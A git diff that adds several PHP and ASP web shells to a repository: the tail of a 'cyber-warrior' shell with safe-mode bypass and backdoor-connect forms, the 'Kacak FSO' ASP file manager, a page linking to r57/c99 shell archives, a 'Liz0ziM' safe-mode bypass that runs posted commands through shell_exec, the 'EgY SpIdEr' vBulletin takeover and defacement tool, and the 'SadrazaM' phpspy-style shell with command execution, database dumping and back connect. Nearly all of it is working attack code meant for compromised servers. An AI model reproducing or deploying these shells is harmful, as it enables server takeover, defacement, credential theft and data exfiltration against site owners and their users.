        "; +print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0); +print "
        ";print"
        "; +print $ec.$ef.$et."
        ";delm(""); +print ""; +print "
        "; +print $st.$c1."
        ".$cpmvmess."
        "; +print $ec.$c2.$sf." ";input("text","ftcpy","File-name",15); +print " To "; +input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " "; +input("submit","cpy","Copy","");print " ";input("submit","mve","Move",""); +print "".$ec.$ef.$et; +print "
        "; +print $st.$c1."
        Cok kullanilan Komutlar
        "; +print $ec.$c2.$sf." ";input("hidden","scdir",$nscdir,0); +print " ";input('text','ustname','',51);print " ";input('submit','ustsub','Execute');print "".$ec.$ef.$et; +print "
        ";delm(": Safe mode bypass :"); +print ""; +print "
        "; +print $st.$c1."
        Using copy() function
        "; +print $ec.$c2.$sf." ";input("text","safefile",$nscdir,75); +input("hidden","scdir",$nscdir,0);print " "; +input("submit","","Read-F","");print "".$ec.$ef.$et; +print "
        "; +print $st.$c1."
        Using ini_restore() function
        "; +print $ec.$c2.$sf." ";input("text","inifile",$nscdir,75); +input("hidden","scdir",$nscdir,0);print " "; +input("submit","","Read-F","");print "".$ec.$ef.$et; +print "
        ";delm("# Backdoor Baglantisi #"); +print ""; +print "
        "; +print $st.$c1."
        Backdoor ile Baglan
        "; +print $ec.$c2.$sf." ";input("text","bip",$REMOTE_ADDR,47);print " "; +input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " "; +input("submit","","Connect","");print " ";input("reset","","Reset",""); +print "".$ec.$ef.$et;print "
        ";print $st.$c1."
        Yüklenmis Backdoor
        "; +print $ec.$c2.$sf." ";print "";print " "; +input("text","uback","back.pl",23);print " "; +input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Connect"); +print "".$ec.$ef.$et;print "
        "; +print "
        "; print"
        "; +print"
        Copyright is reserved to Ekin0x
        [ By Cyber Security TIM Go to : www.cyber-warrior.org ]"; +print"
        +
        "; +?> \ No newline at end of file diff --git a/php/kacak.php b/php/kacak.php new file mode 100644 index 0000000..91ab2b3 --- /dev/null +++ b/php/kacak.php @@ -0,0 +1,903 @@ + +

        www.kacaq.blogspot.com

        || By Kacak ||

        BuqX@HotMail.Com

        + + + + + +Kacak FSO 1.0 / GrayHatz Hacking Team - Terrorist Crew - TurkGuvenligi Priv8 Team / GrayHatz.Org ~ TurkGuvenligi.Ýnfo + + + + + + +<% +if request.querystring("TGH") = "1" then +on error resume next +es=request.querystring("Kacak") +diez=server.urlencode(left(es,(instrRev(es,"\"))-1)) + +Select case es +case "C:" diez="C:" +case "D:" diez="D:" +end select + + + + +%> + + + + + + + +<% +else +%> + + + +<% +if request.querystring("Dosyakaydet") <> "" then +set kaydospos=createobject("scripting.filesystemobject") +set kaydoses=kaydospos.createtextfile(request.querystring("dosyakaydet") & request("dosadi")) +set kaydoses=nothing +set kaydospos=nothing +set kaydospos=createobject("scripting.filesystemobject") +set kaydoses=kaydospos.opentextfile(request.querystring("dosyakaydet") & request("dosadi"), 2, true) +kaydoses.write request("duzenx") +set kaydoses=nothing +set kaydospos=nothing +end if +%> + + + + + +<% +if request.querystring("yenidosya") <> "" then +%> + + + + + + + + + + +
        +

        +

        + + + +
        + TC & GH & TC TEAM ©
        +
        Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team
        + +
        + KACAK FSO 1.0
        +

        +
        +
        + + GrayHatz ~ TurkGuvenligi.Ýnfo 
        +
        + + BuqX@GrayHatz ~ TurkGuvenligi.Ýnfo 

        + + + + + +
        +  Çalýþýlan Klasör + + + + + + +
         <%=response.write(request.querystring("yenidosya"))%> +  
        +
        +
        + + + + + + + + + + + + + +
         
        + &klas=<%=request.querystring("yenidosya")%>" name="kaypos"> +

        +
        +Dosya Adý :
        +
        +
        +
        +
        +
        + +Ýçerik : 
        +
        + +
        +
        +
        + +

        + + + + +
        +

        +  

        + +
        +

        +  

        + + + +<% +else +%> + + + + + + + +<% +if request.querystring("klasorac") <> "" then + +set doses=createobject("scripting.filesystemobject") +set es=doses.createfolder(request.querystring("aktifklas") & request("duzenx")) +set es=nothing +set doses=nothing + + +end if +%> + +<% +if request.querystring("klasac") <> "" then + +set aktifklas=request.querystring("aktifklas") + + +%> + + + + + + + + +
        +

        +

        + + +
        +
        TC & GH & TC TEAM ©
        + Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team
        + +
        + KACAK FSO 1.0
        +

        +
        +
        + + GrayHatz ~ TurkGuvenligi.Ýnfo 
        +
        + + BuqX@Hotmail.com 

        + + + + + + + +
        +  Çalýþýlan Alan + + + + + + +
         <%=aktifklas%> +  
        +
        + + + + + + + + + + + + + + + + + + + +<% +else +%> + + + +<% +if request.querystring("suruculer") <> "" then +%> + +
         
        +
        +

        +   +
        +
        +
        +
        + +

         
        + + + + + + + + +
        +

        +

        + + +
        + TC & GH & TC TEAM ©
        +
        Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team
        + +
        + KACAK FSO 1.0
        +

        +
        +
        + + www.GrayHatz ~ TurkGuvenligi.Ýnfo 
        +
        + + BuqX@Hotmail.com 

        + + + + +
        +  
        +
        + + + + + + + + + + + + +
         
         
        +
        + + + + + + + + +
        + Sürücü Adý + Boyutu + Boþ Alan + Durum + Ýþlem
        +
        +
        +
        +
        + + + <% + set klassis =server.createobject("scripting.filesystemobject") + set klasdri=klassis.drives + %> + + <% + for each dongu in klasdri + %> + + <% + if dongu.driveletter <> "A" then + if dongu.isready=true then + %> + + <% + select case dongu.drivetype + case 0 teype="Diðer" + case 1 teype="Taþýnýr" + case 2 teype="HDD" + case 3 teype="NetWork" + case 4 teype="CD-Rom" + case 5 teype="FlashMem" + end select + %> + + + + + + + + +
        +  <%=dongu.driveletter%>:\ ( <%=dongu.filesystem%> ) + <%=Round(dongu.totalsize/(1024*1024),1)%> MB + <%=Round(dongu.availablespace/(1024*1024),1)%> MB + <%=teype%>  + + + + +
        + + Gir
        +
        + + <% + end if + end if + %> +<% +next +%> + + + +
        +
        +
        +
        + + + + +
        +  
        +
        +
        +

         

        +
         
        + + + + + +<% +else +%> + + + + + +<% +if request.querystring("kaydet") <> "" then +set dossisx=server.createobject("scripting.filesystemobject") +set dosx=dossisx.opentextfile(request.querystring("kaydet"), 2, true) +dosx.write request("duzenx") +dosx.close +set dosyax=nothing +set dossisx=nothing + +end if +%> + + + + +<% +if request.querystring("duzenle") <> "" then +set dossis=server.createobject("scripting.filesystemobject") +set dos=dossis.opentextfile(request.querystring("duzenle"), 1) +sedx = dos.readall +dos.close +set dosya=nothing +set dossis=nothing + +set aktifklas=request.querystring("klas") +%> + + + + + + + + + + + + + +
        +

        +

        + + +
        + TC & GH & TC TEAM©
        +
        Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team
        + +
        + KACAK FSO 1.0
        +

        +
        +
        + + www.GrayHatz ~ TurkGuvenligi.Ýnfo 
        +
        + + BuqX@Hotmail.com 

        + + + + + +
        +  Çalýþýlan Dosya + + + + + + +
         <%=response.write(request.querystring("duzenle"))%> +  
        +
        +
        + + + + + + + + + + + + + +
         
        + &klas=<%=aktifklas%>" name="kaypos"> +

        +

        + + + + +
        +

        + +

        + +
        +

        +  

        + + + +<% +else +%> + + +<% + +if request.querystring("klas") <> "" then +aktifklas=Request.querystring("klas") +if request.querystring("usak") = "1" then +aktifklas=aktifklas & "\" +end if + +else +aktifklas=server.mappath("/") +aktifklas=aktifklas & "\" +end if + +if request.querystring("silklas") <> "" then +set sis=createobject("scripting.filesystemobject") +silincekklas=request.querystring("silklas") +sis.deletefolder(silincekklas) +set sis=nothing +'response.write(sil & " Silindi") +end if + +if request.querystring("sildos") <> "" then +silincekdos=request.querystring("sildos") +set dosx=createobject("scripting.filesystemobject") +set dos=dosx.getfile(silincekdos) +dos.delete +set dos=nothing +set dosyasis=nothing +end if + + + + +select case aktifklas +case "C:" aktifklas="C:\" +case "D:" aktifklas="D:\" +case "E:" aktifklas="E:\" +case "F:" aktifklas="F:\" +case "G:" aktifklas="G:\" +case "H:" aktifklas="H:\" +case "I:" aktifklas="I:\" +case "J:" aktifklas="J:\" +case "K:" aktifklas="K:\" +end select + + + +if aktifklas=("C:") then aktifklas=("C:\") + +Set FS = CreateObject("Scripting.FileSystemObject") +Set klasor = FS.GetFolder(aktifklas) +Set altklasorler = klasor.SubFolders +Set dosyalar = klasor.files +%> + + + + + + + + + +
        +

        +

        + + +
        + TC & GH & TC TEAM ©

        +
        Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team
        + +
        + KACAK FSO 1.0
        +

        +
        +
        + + www.GrayHatz ~ TurkGuvenligi.Ýnfo 
        +
        + + BuqX@Hotmail.com 

        + + + + + +
        +  Çalýþýlan Klasör + + + + + + +
         <%=response.write(aktifklas)%> + + + + + +
        +

        + + " style="text-decoration: none"> + Üst Klasör

        +
        +
        +
        + + + + + + + + + + +
         
        + + + + + + +
        + + + + +
        + + + + Sürücüler
        +
        + + + + +
        + + + Yeni Klasör
        +
        + + + + +
        + + Yeni Dosya
        +
        +
        + + + + + + + + + + +
        +  Tür +  Dosya + Adý +

        +  Ýþlem

        + + + +<% For each oge in altklasorler %> + + + + + + + + + +
        +

        +

        +  <%=oge.name%>  + + + + +
        + +

        + +

        +
        + + + + +
        + +

        + + Sil + +

        +
        + +<% Next %> + + +<% For each oge in dosyalar %> + + + + + + + + + +
        +

        +

        +  <%=oge.name%> +         ( <%=Round(oge.size/1024,1)%> KB )  + + + + +
        + +

        + + Düzenle

        +
        + + + + +
        + +

        + + Sil

        +
        + +<% Next %> + + + +<% +if aktifklas=("C:\") then aktifklas=("C:") +%> + + +<% +end if +%> + + + +<% +end if +%> + + +<% +end if +%> + + +<% +end if +%> + +<% +end if +%> + + + + + + + +
         
        + + diff --git a/php/links.php b/php/links.php new file mode 100644 index 0000000..d35d8ef --- /dev/null +++ b/php/links.php @@ -0,0 +1,78 @@ +r57.txt - c99.txt - r57 shell - c99 shell - r57shell - c99shell - r57 - +c99 - shell archive - php shells - php exploits - bypass shell - safe mode +bypass - sosyete safe mode bypass shell - Evil Shells - exploit - root - +r57.in + + + + + + + +
        +
        
        +
        
        +
        
        +    

        +ShellCodes and Exploits City

        + +

        [ Home ] | [ Shell ] | [ Video ] | [ Links ] + +

        + +

        +[ Sosyete | T0fan +[ Kernel@Sh | Milw0rm +Google Big Darkc0de ] BackTrack ] + + + + +www.r57.in +

        + +Send all submissions to Mail r57 or r57.in + + Copyright © 2oo8~2oo9 Localshell + +Sitemiz en iyi Firefox ile (1024 x 768 veya Üstü çözünürlükte) görünmektedir. + +
        +
        diff --git a/php/liz0zim.php b/php/liz0zim.php new file mode 100644 index 0000000..dcc8d31 --- /dev/null +++ b/php/liz0zim.php @@ -0,0 +1,34 @@ +Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit

        "; +print_r(' +
        +
        +Komut : +
        +
        +Hýzlý Menü :=) : + +
        +'); +ini_restore("safe_mode"); +ini_restore("open_basedir"); +$liz0=shell_exec($_POST[baba]); +$liz0zim=shell_exec($_POST[liz0]); +$uid=shell_exec('id'); +$server=shell_exec('uname -a'); +echo "

        "; +echo "Kimim Ben :=):$uid
        "; +echo "Server:$server
        "; +echo "Komut Sonuçlarý:
        "; +echo $liz0; +echo $liz0zim; +echo "

        "; +?> \ No newline at end of file diff --git a/php/login.php b/php/login.php new file mode 100644 index 0000000..3585c62 --- /dev/null +++ b/php/login.php @@ -0,0 +1,583 @@ + +EgY SpIdEr + + + +
        + + + + + + + + + + + + + + +
        ::::Read Config Data::::' . $path . ''; ?>
        Host : ' . $config['MasterServer']['servername'] . ''; ?>
        User : ' . $config['MasterServer']['username'] . ''; ?>
        Pass : No Password'; +} else { +$result = '' . $passsql . ''; +} +echo $result; ?>
        Name : ' . $config['Database']['dbname'] . ''; ?>
        +Nope,
        No cOnnection with user'); +mysql_select_db($db) or die('Nope,No cOnnection with DB'); +if ($pass == '') +{ +$npass = 'NULL'; +} else { +$npass = $pass; +} +echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; +?> +
        +User : ' . $vbuser . ' was deleted
        '; +} else { +echo 'User : ' . $vbuser . ' could not be deleted'; +} +} +if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="shell" && isset($_POST['var'])) +{ +$host = $_POST['host']; +$user = $_POST['user']; +$pass = $_POST['pass']; +$db = $_POST['db']; +$var = $_POST['var']; +mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); +mysql_select_db($db) or die('Nope,No cOnnection with DB'); +if ($pass == '') +{ +$npass = 'NULL'; +} else { +$npass = $pass; +} +echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; +?> +
        +Done Exploit.


        Use this :
        index.php?" . $var . "=shell.txt";}else{ +echo "

        Error

        ";} +$result1=mysql_query($Wdt2); + if ($result1) { echo "

        Done Create File


        Use this :
        index.php?" . $var . "=shell.txt";} else{ echo "

        Error

        ";} +} +if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="code" && isset($_POST['code'])) +{ +$host = $_POST['host']; +$user = $_POST['user']; +$pass = $_POST['pass']; +$db = $_POST['db']; +$index = $_POST['code']; +mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); +mysql_select_db($db) or die('Nope,No cOnnection with DB'); +if ($pass == '') +{ +$npass = 'NULL'; +} else { +$npass = $pass; +} +echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; +?> +
        +Index was Changed Succefully

        ";}else{ +echo "

        Failed to change index

        ";} +$result1=mysql_query($Wdt2); +if ($result1) {echo "

        Done Create File

        ";} else{ echo "

        Error

        ";} +} + +if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="inc" && isset($_POST['link'])) +{ +$host = $_POST['host']; +$user = $_POST['user']; +$pass = $_POST['pass']; +$db = $_POST['db']; +$vblink = $_POST['link']; +mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); +mysql_select_db($db) or die('Nope,No cOnnection with DB'); +if ($pass == '') +{ +$npass = 'NULL'; +} else { +$npass = $pass; +} +echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; +?> +
        +Nope,
        No cOnnection with user'); +mysql_select_db($db) or die('Nope,No cOnnection with DB'); +if ($pass == '') +{ +$npass = 'NULL'; +} else { +$npass = $pass; +} +echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; +?> +
        +The E-MAIL of the user ' . $vbuser . ' was changed to ' . $vbmail . '
        Back to Shell
        '; +} else { +echo 'Failed to change E-MAIL'; +} +} +if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="psw" && isset($_POST['vbuser']) && isset($_POST['vbpass'])) +{ +$host = $_POST['host']; +$user = $_POST['user']; +$pass = $_POST['pass']; +$db = $_POST['db']; +$vbuser = $_POST['vbuser']; +$vbpass = $_POST['vbpass']; +mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); +mysql_select_db($db) or die('Nope,No cOnnection with DB'); +if ($pass == '') +{ +$npass = 'NULL'; +} else { +$npass = $pass; +} +echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; +?> +
        +The pass of the user ' . $vbuser . ' was changed to ' . $vbpass . '
        Back to Shell
        '; +} else { +echo 'Failed to change PassWord'; +} +} +} +if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="login") +{ +$host = $_POST['host']; +$user = $_POST['user']; +$pass = $_POST['pass']; +$db = $_POST['db']; +mysql_connect($host,$user,$pass) or die('Nope,No cOnnection with user'); +mysql_select_db($db) or die('Nope,No cOnnection with DB'); +if ($pass == '') +{ +$npass = 'NULL'; +} else { +$npass = $pass; +} +echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; +?> +
        +
        + + + + +
        :::::Change User Password:::::
        User :
        Pass :
        +'; +?> +
        +
        +
        + + + + +
        :::::Change User E-MAIL:::::
        User :
        MAIL :
        +'; +?> +
        +
        +
        + + + +
        :::::Delete a user:::::
        User :
        +'; +?> +
        +
        +
        + + + +
        :::::Change Index by Inclusion(Not PL(Al-Massya)):::::
        Index Link :
        +'; +?> +
        +
        +
        + + + +
        :::::Change Index by Code(All Edition):::::
        Index Code :
        +'; +?> +
        +
        +
        + + + +
        :::::Inject FileInclusion Exploit(NOT PL(AL-MASSYA)):::::
        Variable :
        +'; +?> +
        + +
        + + + + + +
        :::::DATABASE CONFIG:::::
        Host :
        User :
        Pass :
        Name :
        +
        + +Nope,
        No cOnnection with user'); +mysql_select_db($db) or die('Nope,No cOnnection with DB'); +if ($pass == '') +{ +$npass = 'NULL'; +} else { +$npass = $pass; +} +echo'You are connected with the mysql server of ' . $host . ' by user : ' . $user . ' , pass : ' . $npass . ' and selected DB with the name ' . $db . ''; +?> +
        +IDUSERNAMEEMAIL'; +while ($row = mysql_fetch_array($re)) +{ +echo'' . $row['userid'] . '' . $row['username'] . '' . $row['email'] . ''; +} +echo''; +?> +
        + +
        + + + + + +
        :::::DATABASE CONFIG:::::
        Host :
        User :
        Pass :
        Name :
        +
        + +
        + + +
        :::::CONFIG PATH:::::
        PATH :
        + +?> + +
        Center ||| Left ||| right ||| Bold ||| UnderLine ||| Italic ||| NewLine ||| Colour ||| Marquee ||| Picture ||| Link
        +

        +
        + +
        Copy The Code after Finishing your index
        + +
        +
        Main ShellList UsersIndex MakerReadConfig
        +

        www.egyspider.com

        +
        + + + + + + +

        o---[ r57.biz | | egy_spider@hotmail.com |developer by egy spider (ahmed rageh) ]---o

        +
        +
        + + \ No newline at end of file diff --git a/php/sadrazam.php b/php/sadrazam.php new file mode 100644 index 0000000..4369d8b --- /dev/null +++ b/php/sadrazam.php @@ -0,0 +1,1973 @@ + $_value) { + if ($_key{0} != '_') { + if (IS_GPC) { + $_value = s_array($_value); + } + $$_key = $_value; + } + } +} + +/*===================== ||-Є+ф+| =====================*/ +$admin = array(); +// -|+ё-ш-к|#-ы-щ+д, true +к-ш-к-щ+д, false +к+#+++ +ы.--|ц-б-ю+Є+|-з +$admin['check'] = 0; +// +ч| -ш-к|#-ы-щ+д,|ы-|+-||-+|#-ы +$admin['pass'] = 'angel'; + +//+ч- |+ cookie +ў+|+|+з+-|+-т-к|є, +Є||-+#++ |г, |ы-|+---|ц#ф-+, +ё+Є|ы#г|+-м+- +// cookie |#+| +$admin['cookiepre'] = ''; +// cookie +ў+|+Є +$admin['cookiedomain'] = ''; +// cookie +ў+|-++| +$admin['cookiepath'] = '/'; +// cookie +--з|+ +$admin['cookielife'] = 86400; +/*===================== +ф+|+с- =====================*/ + +if ($charset == 'utf8') { + header("content-Type: text/html; charset=utf-8"); +} elseif ($charset == 'big5') { + header("content-Type: text/html; charset=big5"); +} elseif ($charset == 'gbk') { + header("content-Type: text/html; charset=gbk"); +} elseif ($charset == 'latin1') { + header("content-Type: text/html; charset=iso-8859-2"); +} + +$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; +$timestamp = time(); + +/*===================== +э+|-щ+д =====================*/ +if ($action == "logout") { + scookie('phpspypass', '', -86400 * 365); + p(''); + p('Success'); + exit; +} +if($admin['check']) { + if ($doing == 'login') { + if ($admin['pass'] == $password) { + scookie('phpspypass', $password); + p(''); + p('Success'); + exit; + } + } + if ($_COOKIE['phpspypass']) { + if ($_COOKIE['phpspypass'] != $admin['pass']) { + loginpage(); + } + } else { + loginpage(); + } +} +/*===================== -щ+д+с- =====================*/ + +$errmsg = ''; + +// #щ+|PHPINFO +if ($action == 'phpinfo') { + if (IS_PHPINFO) { + phpinfo(); + } else { + $errmsg = 'phpinfo() function has non-permissible'; + } +} + +// --+++-+ +if ($doing == 'downfile' && $thefile) { + if (!@file_exists($thefile)) { + $errmsg = 'The file you want Downloadable was nonexistent'; + } else { + $fileinfo = pathinfo($thefile); + header('Content-type: application/x-'.$fileinfo['extension']); + header('Content-Disposition: attachment; filename='.$fileinfo['basename']); + header('Content-Length: '.filesize($thefile)); + @readfile($thefile); + exit; + } +} + +// +#++--++#++|- +|+т +if ($doing == 'backupmysql' && !$saveasfile) { + dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); + $table = array_flip($table); + $result = q("SHOW tables"); + if (!$result) p('

        '.mysql_error().'

        '); + $filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql'); + header('Content-type: application/unknown'); + header('Content-Disposition: attachment; filename='.$filename); + $mysqldata = ''; + while ($currow = mysql_fetch_array($result)) { + if (isset($table[$currow[0]])) { + $mysqldata .= sqldumptable($currow[0]); + } + } + mysql_close(); + exit; +} + +// -и| MYSQL--+++-+ +if($doing=='mysqldown'){ + if (!$dbname) { + $errmsg = 'Please input dbname'; + } else { + dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); + if (!file_exists($mysqldlfile)) { + $errmsg = 'The file you want Downloadable was nonexistent'; + } else { + $result = q("select load_file('$mysqldlfile');"); + if(!$result){ + q("DROP TABLE IF EXISTS tmp_angel;"); + q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);"); + //+|-#+ф|-+|#э-+++|-,##|т|Ў-+|-+б+++э+Є# |м__angel_1111111111_eof__|-+-+ -##+-ъ+ |-|щ+Ў + q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';"); + $result = q("select content from tmp_angel"); + q("DROP TABLE tmp_angel"); + } + $row = @mysql_fetch_array($result); + if (!$row) { + $errmsg = 'Load file failed '.mysql_error(); + } else { + $fileinfo = pathinfo($mysqldlfile); + header('Content-type: application/x-'.$fileinfo['extension']); + header('Content-Disposition: attachment; filename='.$fileinfo['basename']); + header("Accept-Length: ".strlen($row[0])); + echo $row[0]; + exit; + } + } + } +} + +?> + + + +<?php echo str_replace('.','','SadrazaM | Casus Shell');?> + + + + + + + + + + + + +
        Ver: 2010 ()
        Safe Mode: + Cıkıs | + File Manager | + MySQL Manager | + MySQL Upload & Download | + Komut Calıstır | + PHP Variable | + Eval PHP Code + | Back Connect +
        +'); + + p(''); + + //#щ+|- +-++-|+-+ |--+-+ + $dirdata=array(); + $filedata=array(); + + if ($view_writable) { + $dirdata = GetList($nowpath); + } else { + // -+-+--#э + $dirs=@opendir($dir); + while ($file=@readdir($dirs)) { + $filepath=$nowpath.$file; + if(@is_dir($filepath)){ + $dirdb['filename']=$file; + $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); + $dirdb['dirchmod']=getChmod($filepath); + $dirdb['dirperm']=getPerms($filepath); + $dirdb['fileowner']=getUser($filepath); + $dirdb['dirlink']=$nowpath; + $dirdb['server_link']=$filepath; + $dirdb['client_link']=ue($filepath); + $dirdata[]=$dirdb; + } else { + $filedb['filename']=$file; + $filedb['size']=sizecount(@filesize($filepath)); + $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); + $filedb['filechmod']=getChmod($filepath); + $filedb['fileperm']=getPerms($filepath); + $filedb['fileowner']=getUser($filepath); + $filedb['dirlink']=$nowpath; + $filedb['server_link']=$filepath; + $filedb['client_link']=ue($filepath); + $filedata[]=$filedb; + } + }// while + unset($dirdb); + unset($filedb); + @closedir($dirs); + } + @sort($dirdata); + @sort($filedata); + $dir_i = '0'; + foreach($dirdata as $key => $dirdb){ + if($dirdb['filename']!='..' && $dirdb['filename']!='.') { + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + $dir_i++; + } else { + if($dirdb['filename']=='..') { + p(''); + p(''); + p(''); + } + } + } + + p(''); + p(''); + makehide('action','file'); + makehide('thefile'); + makehide('doing'); + makehide('dir',$nowpath); + $file_i = '0'; + foreach($filedata as $key => $filedb){ + if($filedb['filename']!='..' && $filedb['filename']!='.') { + $fileurl = str_replace(SA_ROOT,'',$filedb['server_link']); + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + $file_i++; + } + } + p(''); + p('
        +'goaction')); +makehide('action'); +formfoot(); + +$errmsg && m($errmsg); + +// +ё+б|#|#-++| +!$dir && $dir = '.'; +$nowpath = getPath(SA_ROOT, $dir); +if (substr($dir, -1) != '/') { + $dir = $dir.'/'; +} +$uedir = ue($dir); + +if (!$action || $action == 'file') { + + // +-|-|--||щ+Ў + $dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable'; + + // ++| -+-+ + if ($doing == 'deldir' && $thefile) { + if (!file_exists($thefile)) { + m($thefile.' directory does not exist'); + } else { + m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed')); + } + } + + // ||+и-+-+ + elseif ($newdirname) { + $mkdirs = $nowpath.$newdirname; + if (file_exists($mkdirs)) { + m('Directory has already existed'); + } else { + m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed')); + @chmod($mkdirs,0777); + } + } + + // +-|л+-+ + elseif ($doupfile) { + m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed')); + } + + // #р+н+-+ + elseif ($editfilename && $filecontent) { + $fp = @fopen($editfilename,'w'); + m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed')); + @fclose($fp); + } + + // #р+н+-+ -Ї-+ + elseif ($pfile && $newperm) { + if (!file_exists($pfile)) { + m('The original file does not exist'); + } else { + $newperm = base_convert($newperm,8,10); + m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed')); + } + } + + // +-| + elseif ($oldname && $newfilename) { + $nname = $nowpath.$newfilename; + if (file_exists($nname) || !file_exists($oldname)) { + m($nname.' has already existed or original file does not exist'); + } else { + m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed')); + } + } + + // +|+|+-+ + elseif ($sname && $tofile) { + if (file_exists($tofile) || !file_exists($sname)) { + m('The goal file has already existed or original file does not exist'); + } else { + m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed')); + } + } + + // +--б-#+ф + elseif ($curfile && $tarfile) { + if (!@file_exists($curfile) || !@file_exists($tarfile)) { + m('The goal file has already existed or original file does not exist'); + } else { + $time = @filemtime($tarfile); + m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed')); + } + } + + // ++|и-х-#+ф + elseif ($curfile && $year && $month && $day && $hour && $minute && $second) { + if (!@file_exists($curfile)) { + m(basename($curfile).' does not exist'); + } else { + $time = strtotime("$year-$month-$day $hour:$minute:$second"); + m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed')); + } + } + + // |Є# --++ + elseif($doing == 'downrar') { + if ($dl) { + $dfiles=''; + foreach ($dl as $filepath => $value) { + $dfiles.=$filepath.','; + } + $dfiles=substr($dfiles,0,strlen($dfiles)-1); + $dl=explode(',',$dfiles); + $zip=new PHPZip($dl); + $code=$zip->out; + header('Content-type: application/octet-stream'); + header('Accept-Ranges: bytes'); + header('Accept-Length: '.strlen($code)); + header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz'); + echo $code; + exit; + } else { + m('Please select file(s)'); + } + } + + // + -+++| +-+ + elseif($doing == 'delfiles') { + if ($dl) { + $dfiles=''; + $succ = $fail = 0; + foreach ($dl as $filepath => $value) { + if (@unlink($filepath)) { + $succ++; + } else { + $fail++; + } + } + m('Deleted file have finishedгмchoose '.count($dl).' success '.$succ.' fail '.$fail); + } else { + m('Please select file(s)'); + } + } + + //#++ў-ъ#- + formhead(array('name'=>'createdir')); + makehide('newdirname'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'fileperm')); + makehide('newperm'); + makehide('pfile'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'copyfile')); + makehide('sname'); + makehide('tofile'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'rename')); + makehide('oldname'); + makehide('newfilename'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'fileopform')); + makehide('action'); + makehide('opfile'); + makehide('dir'); + formfoot(); + + $free = @disk_free_space($nowpath); + !$free && $free = 0; + $all = @disk_total_space($nowpath); + !$all && $all = 0; + $used = $all-$free; + $used_percent = @round(100/($all/$free),2); + p('

        File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)

        '); + +?> + + + + + + + + +
        Bulundugun Dizin (, )
        + +
        '); + p('
